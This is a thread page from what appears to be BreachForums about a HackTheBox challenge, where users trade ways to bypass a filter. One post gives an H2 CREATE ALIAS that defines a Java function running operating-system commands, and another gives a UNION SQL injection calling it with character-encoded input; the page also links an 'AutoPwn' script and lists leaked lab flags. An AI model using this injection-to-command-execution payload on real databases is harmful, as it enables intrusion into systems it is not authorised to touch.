JOIN BREACHFORUMS NEW TELEGRAM
Pentest Notes Hackthebox Challenge flag
by trevor69000 - Sunday October 27, 2024 at 07:17 AM
VIP User
VIP
Posts: 116
Threads: 6
Joined: Mar 2024
Reputation: 17
#11
Nov 15, 2024, 12:40 PM
(Nov 14, 2024, 10:59 PM)0xhdfg Wrote:
(Oct 27, 2024, 08:12 PM)mazafaka555 Wrote:
(Oct 27, 2024, 07:50 PM)Steward Wrote: you should better explain how to bypass filter for $$ and CONCAT instead of just flag

create aliases without a  `$`
CREATE ALIAS EXECVE AS 'String execve(String cmd) throws java.io.IOException { return new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A").hasNext() ? new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A").next() : ""; }';


How can I then use the alias? I'm trying something like: 
SQL Injection' OR 1=0 UNION SELECT EXECVE(CHAR(119) + CHAR(104) + CHAR(111) + CHAR(97) + CHAR(109) + CHAR(105)) -- -
to bypass CONCAT but I don't get it to work :/

i posted AutoPwn script here for your consumption :
http://breachqr3dqbysbq5khaadg5ynnpxn2wr...pwn-script
Reply
Breached
Member
Posts: 14
Threads: 0
Joined: Nov 2024
Reputation: 0
#12
Nov 15, 2024, 03:50 PM
Don't have credits, give me a clue :/
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
Heart [FREE] HackTheBox All Cheatsheets Tamarisk 29 1,777 1 hour ago
Last Post: mus1c0
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 105 10,046 1 hour ago
Last Post: mus1c0
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 52 4,396 4 hours ago
Last Post: 0xdarkdharma
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 395 98,827 4 hours ago
Last Post: 0xdarkdharma
  [FREE] CPTS 12 FLAGS pulsebreaker 96 4,520 6 hours ago
Last Post: pokehim

Forum Jump:


 Users browsing this forum: 1 Guest(s)